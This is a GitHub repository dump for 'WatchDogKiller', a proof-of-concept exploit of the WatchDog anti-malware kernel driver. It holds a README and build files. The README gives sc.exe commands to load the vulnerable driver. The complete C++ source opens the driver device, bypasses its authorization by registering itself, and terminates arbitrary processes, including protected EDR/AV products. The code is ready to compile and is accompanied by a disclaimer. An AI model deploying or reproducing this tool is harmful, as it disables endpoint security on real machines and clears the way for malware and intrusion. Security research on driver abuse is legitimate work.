├── WatchDogKiller
├── x64
│ ├── Debug
│ │ ├── WatchDogKiller.log
│ │ ├── WatchDogKiller.vcxproj.FileListAbsolute.txt
│ │ ├── WatchDogKiller.exe.recipe
│ │ └── WatchDogKiller.Build.CppClean.log
│ └── Release
│ │ ├── vc143.pdb
│ │ ├── WatchDogKiller.obj
│ │ ├── WatchDogKiller.iobj
│ │ ├── WatchDogKiller.ipdb
│ │ ├── WatchDogKiller.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── link.read.1.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── link.write.1.tlog
│ │ ├── link.command.1.tlog
│ │ ├── Cl.items.tlog
│ │ ├── WatchDogKiller.lastbuildstate
│ │ └── link.secondary.1.tlog
│ │ ├── WatchDogKiller.log
│ │ └── WatchDogKiller.exe.recipe
├── WatchDogKiller.vcxproj.user
├── WatchDogKiller.vcxproj.filters
├── WatchDogKiller.cpp
└── WatchDogKiller.vcxproj
├── wamsdk.sys
├── x64
└── Release
│ ├── WatchDogKiller.exe
│ └── WatchDogKiller.pdb
├── WatchDogKiller.sln
└── README.md
/WatchDogKiller/x64/Debug/WatchDogKiller.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Debug/WatchDogKiller.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/wamsdk.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/wamsdk.sys
--------------------------------------------------------------------------------
/x64/Release/WatchDogKiller.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/x64/Release/WatchDogKiller.exe
--------------------------------------------------------------------------------
/x64/Release/WatchDogKiller.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/x64/Release/WatchDogKiller.pdb
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.obj
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.iobj
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.ipdb
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/j3h4ck/WatchDogKiller/HEAD/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/Cl.items.tlog:
--------------------------------------------------------------------------------
1 | D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\WatchDogKiller.cpp;D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\x64\Release\WatchDogKiller.obj
2 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/WatchDogKiller.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.42.34433:TargetPlatformVersion=10.0.26100.0:
2 | Release|x64|D:\Visual Studio Projects\CETP\WatchDogKiller\|
3 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.tlog/link.secondary.1.tlog:
--------------------------------------------------------------------------------
1 | ^D:\VISUAL STUDIO PROJECTS\CETP\WATCHDOGKILLER\WATCHDOGKILLER\X64\RELEASE\WATCHDOGKILLER.OBJ
2 | D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\x64\Release\WatchDogKiller.IPDB
3 | D:\Visual Studio Projects\CETP\WatchDogKiller\WatchDogKiller\x64\Release\WatchDogKiller.iobj
4 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.log:
--------------------------------------------------------------------------------
1 | WatchDogKiller.cpp
2 | Generating code
3 | Previous IPDB not found, fall back to full compilation.
4 | All 7 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
5 | Finished generating code
6 | WatchDogKiller.vcxproj -> D:\Visual Studio Projects\CETP\WatchDogKiller\x64\Release\WatchDogKiller.exe
7 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Debug/WatchDogKiller.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | D:\Visual Studio Projects\CETP\WatchDogKiller\x64\Debug\WatchDogKiller.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Release/WatchDogKiller.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | D:\Visual Studio Projects\CETP\WatchDogKiller\x64\Release\WatchDogKiller.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/WatchDogKiller.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.12.35514.174 d17.12
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WatchDogKiller", "WatchDogKiller\WatchDogKiller.vcxproj", "{78B504FC-8616-4AE5-A00C-03C005AA820D}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x64.ActiveCfg = Debug|x64
17 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x64.Build.0 = Debug|x64
18 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x86.ActiveCfg = Debug|Win32
19 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Debug|x86.Build.0 = Debug|Win32
20 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x64.ActiveCfg = Release|x64
21 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x64.Build.0 = Release|x64
22 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x86.ActiveCfg = Release|Win32
23 | {78B504FC-8616-4AE5-A00C-03C005AA820D}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | EndGlobal
29 |
--------------------------------------------------------------------------------
/WatchDogKiller/x64/Debug/WatchDogKiller.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\vc143.pdb
2 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\vc143.idb
3 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.obj
4 | d:\visual studio projects\cetp\watchdogkiller\x64\debug\watchdogkiller.exe
5 | d:\visual studio projects\cetp\watchdogkiller\x64\debug\watchdogkiller.pdb
6 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.ilk
7 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.command.1.tlog
8 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.items.tlog
9 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.read.1.tlog
10 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\cl.write.1.tlog
11 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.command.1.tlog
12 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.read.1.tlog
13 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.secondary.1.tlog
14 | d:\visual studio projects\cetp\watchdogkiller\watchdogkiller\x64\debug\watchdogkiller.tlog\link.write.1.tlog
15 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WatchDogKiller – Weaponizing the WatchDog Anti-Malware Driver Vulnerability
2 |
3 | ## 📖 Research Article
4 | This repository is the Proof-of-Concept (PoC) accompanying my technical write-up on the WatchDog Anti-Malware (amsdk.sys) BYOVD vulnerability.
5 | 👉 Full research available here: [Researching an APT Attack and Weaponizing It: The WatchDog BYOVD Story](https://medium.com/@jehadbudagga/researching-an-apt-attack-and-weaponizing-it-56daabee11c9)
6 |
7 | ---
8 |
9 | ## ⚡ Overview
10 | The Silver Fox APT group leveraged a vulnerable Microsoft-signed driver (`wamsdk.sys`) in recent attacks to disable security products.
11 | I reversed the latest WatchDog driver (`amsdk.sys v1.1.100`) and discovered that the arbitrary process termination vulnerability was still exploitable.
12 |
13 | As of 11/9/2025, the driver is not listed on either LOLDrivers or the HVCI block list.
14 |
15 | This PoC demonstrates:
16 | - Registering a process with the driver (`IOCTL_REGISTER_PROCESS`)
17 | - Using the termination routine (`IOCTL_TERMINATE_PROCESS`)
18 | - Bypassing the driver’s authorization mechanism
19 | - Killing protected EDR/AV processes (Bitdefender, Sophos, Kaspersky, etc.)
20 |
21 | ---
22 |
23 | ## 🛠️ Usage
24 | > ⚠️ **Disclaimer**: This code is for educational and research purposes only. Do not use it on systems you do not own.
25 |
26 | 1. Load the vulnerable driver:
27 | ```powershell
28 | sc.exe create killer binPath="C:\Path\To\wamsdk.sys" type=kernel
29 | sc.exe start killer
30 | ```
31 |
32 | 2. Run the PoC:
33 | ```
34 | .\WatchDogKiller.exe
35 |
36 | WatchDog EDR Terminator Tool @j3h4ck
37 | ================================================
38 |
39 | Successfully opened Zam device
40 | Attempting to register process 9444...
41 | Successfully registered process 9444
42 |
43 | Enter PID to terminate: 30724
44 | Wait for process exit? (0 = No, 1 = Yes): 0
45 |
46 | Attempting to terminate PID 30724...
47 | Successfully sent terminate request for PID 30724
48 | Terminate request completed successfully.
49 |
50 | Enter PID to terminate:
51 | ```
52 | ## References
53 | - Research Article: https://medium.com/p/56daabee11c9/
54 | - The Hacker News – Silver Fox Exploits Microsoft-Signed Driver: https://thehackernews.com/2025/09/silver-fox-exploits-microsoft-signed.html
55 |
56 | ---
57 |
58 | ## Author
59 | Jehad Abudagga
60 | - LinkedIn: https://www.linkedin.com/in/jehadabudagga/
61 | - GitHub: https://github.com/j3h4ck
62 |
63 | ---
64 |
65 | ## Disclaimer
66 | This project is released for educational and security research purposes only.
67 | The author does not endorse or condone the misuse of this information.
68 |
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
// Define the IOCTL codes
// Control codes sent to the driver by RegisterCurrentProcess() and
// TerminateProcessByPid() below. From a defender's point of view, a user-mode
// process issuing these two codes against the device names below is the
// host-level observable for this tool.
#define IOCTL_REGISTER_PROCESS 0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

// Define the device names
// Device paths tried by OpenZamDevice(), primary first, then the GUID-named
// fallback with identical access flags.
#define ZAM_DEVICE_NAME L"\\\\.\\amsdk"
#define ZAM_GUARD_DEVICE_NAME L"\\\\.\\B5A6B7C9-1E31-4E62-91CB-6078ED1E9A4F"

// Define NTSTATUS values
// NOTE(review): none of these three constants is referenced anywhere in this
// file, and each expands to a cast to NTSTATUS, a type this file does not
// declare itself (it must come from one of the #include lines above, whose
// header names were lost in this listing).
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
17 |
// Input buffer layout for IOCTL_TERMINATE_PROCESS as built by
// TerminateProcessByPid(): two 32-bit fields, passed with sizeof(request)
// as the input length and no output buffer.
typedef struct _TERMINATE_PROCESS_REQUEST {
    DWORD ProcessId;   // PID forwarded verbatim from the caller
    DWORD WaitForExit; // written as 1 or 0 by TerminateProcessByPid(); driver-side meaning not visible here
} TERMINATE_PROCESS_REQUEST, * PTERMINATE_PROCESS_REQUEST;
22 |
// Opens a handle to the driver's control device.
//
// Tries ZAM_DEVICE_NAME first and, only if that open returns
// INVALID_HANDLE_VALUE, retries with ZAM_GUARD_DEVICE_NAME using the same
// access, share and open flags.
//
// Returns: the device handle, or INVALID_HANDLE_VALUE when both opens failed.
// The caller owns the handle and must CloseHandle() it (main() does).
// Note that after a double failure GetLastError() reflects only the second
// CreateFileW call, so the reason the primary open failed is not reported.
HANDLE OpenZamDevice() {
    HANDLE hDevice = CreateFileW(
        ZAM_DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );

    // Fallback device path; identical parameters apart from the name.
    if (hDevice == INVALID_HANDLE_VALUE) {
        hDevice = CreateFileW(
            ZAM_GUARD_DEVICE_NAME,
            GENERIC_READ | GENERIC_WRITE,
            FILE_SHARE_READ | FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            FILE_ATTRIBUTE_NORMAL,
            NULL
        );
    }

    return hDevice;
}
48 |
// Sends IOCTL_REGISTER_PROCESS with this process's own PID as the input
// buffer (sizeof(DWORD) bytes) and no output buffer.
//
// hDevice: handle returned by OpenZamDevice().
// Returns: the BOOL result of DeviceIoControl. The outcome is printed to
// stdout in both cases; on failure the GetLastError() value is printed too.
// NOTE(review): `pid` and the GetLastError() result are DWORDs printed with
// %d; that is a signed/unsigned format mismatch (harmless for the small values
// seen in practice, but %lu would match the type).
BOOL RegisterCurrentProcess(HANDLE hDevice) {
    DWORD bytesReturned = 0;
    DWORD pid = GetCurrentProcessId();

    printf("Attempting to register process %d...\n", pid);

    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_REGISTER_PROCESS,
        &pid,
        sizeof(pid),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (result) {
        printf("Successfully registered process %d\n", pid);
    }
    else {
        printf("Failed to register process. Error: %d\n", GetLastError());
    }

    return result;
}
75 |
// Builds a TERMINATE_PROCESS_REQUEST for `pid` and sends it with
// IOCTL_TERMINATE_PROCESS (sizeof(request) input bytes, no output buffer).
//
// hDevice:     handle returned by OpenZamDevice().
// pid:         process id placed in request.ProcessId unchanged; nothing here
//              validates it (main() passes whatever strtoul() parsed, which is
//              0 for unparsable input).
// waitForExit: any nonzero value is normalised to 1 before being stored.
// Returns: the BOOL result of DeviceIoControl; outcome printed to stdout, with
// GetLastError() on failure (%d used for a DWORD, same mismatch as in
// RegisterCurrentProcess()).
BOOL TerminateProcessByPid(HANDLE hDevice, DWORD pid, BOOL waitForExit) {
    DWORD bytesReturned = 0;

    TERMINATE_PROCESS_REQUEST request;
    request.ProcessId = pid;
    request.WaitForExit = waitForExit ? 1 : 0;

    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_TERMINATE_PROCESS,
        &request,
        sizeof(request),
        NULL,
        0,
        &bytesReturned,
        NULL
    );

    if (result) {
        printf("Successfully sent terminate request for PID %d\n", pid);
    }
    else {
        printf("Failed to terminate process. Error: %d\n", GetLastError());
    }

    return result;
}
103 |
// Interactive entry point.
//
// Opens the device, registers this process once (a registration failure is
// reported but not fatal), then loops forever reading a PID and a wait flag
// from stdin and forwarding each pair to TerminateProcessByPid().
//
// Returns: 1 if the device could not be opened or if either fgets() hits
// EOF/error (both paths close the handle first). The `while (true)` loop has
// no break, so the CloseHandle()/return 0 after it is unreachable; the only
// normal way out is end of input on stdin.
// For defenders: the sequence open-device -> register-self -> terminate-by-PID
// seen here is the behavioural pattern to look for on the endpoint.
int main() {
    DWORD pid;
    int waitOption;
    char input[256];

    printf("WatchDog EDR Terminator Tool @j3h4ck\n");
    printf("================================================\n\n");

    // Open device
    HANDLE hDevice = OpenZamDevice();
    if (hDevice == INVALID_HANDLE_VALUE) {
        // GetLastError() here reflects only the fallback open inside OpenZamDevice().
        printf("Failed to open Zam device. Error: %d\n", GetLastError());
        return 1;
    }
    printf("Successfully opened Zam device\n");

    // Bypass authentication by registering first
    // Non-fatal: execution continues into the loop even when this fails.
    if (!RegisterCurrentProcess(hDevice)) {
        printf("Authentication bypass failed. Trying without registration...\n");
    }
    while (true) {
        // Get target PID
        printf("\nEnter PID to terminate: ");
        if (fgets(input, sizeof(input), stdin) == NULL) {
            printf("Error reading input.\n");
            CloseHandle(hDevice);
            return 1;
        }
        // No validation: unparsable text yields pid 0, which is still forwarded.
        pid = strtoul(input, NULL, 10);

        printf("Wait for process exit? (0 = No, 1 = Yes): ");
        if (fgets(input, sizeof(input), stdin) == NULL) {
            printf("Error reading input.\n");
            CloseHandle(hDevice);
            return 1;
        }
        // Passed as a BOOL below, so any nonzero answer means "wait".
        waitOption = atoi(input);

        printf("\nAttempting to terminate PID %lu...\n", pid);

        // Try to terminate
        if (TerminateProcessByPid(hDevice, pid, waitOption)) {
            printf("Terminate request completed successfully.\n");
        }
        else {
            printf("Terminate request failed.\n");
        }
    }
    // Unreachable: the loop above never breaks.
    CloseHandle(hDevice);
    return 0;
}
--------------------------------------------------------------------------------
/WatchDogKiller/WatchDogKiller.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {78b504fc-8616-4ae5-a00c-03c005aa820d}
25 | WatchDogKiller
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 | MultiThreaded
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
--------------------------------------------------------------------------------